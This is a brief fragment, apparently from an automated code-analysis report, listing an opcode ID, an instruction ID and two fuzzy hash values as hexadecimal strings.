                                                                                                    • Opcode ID: 5c7bf163557b2066fab1499a91b96f9435b7b54f10cfdb6e6711bfc6a5562b24
                                                                                                    • Instruction ID: 1e5d482fc14e60046ac7aa7f6a34b5543c5aca1af1fd7f5ee15b6af5c46a3fd6
                                                                                                    • Opcode Fuzzy Hash: 5c7bf163557b2066fab1499a91b96f9435b7b54f10cfdb6e6711bfc6a5562b24
                                                                                                    • Instruction Fuzzy Hash: 41613BB2B1864246E6608A39E400E7A725AFF90B91F444235EE5E477C9FF3CE605C70C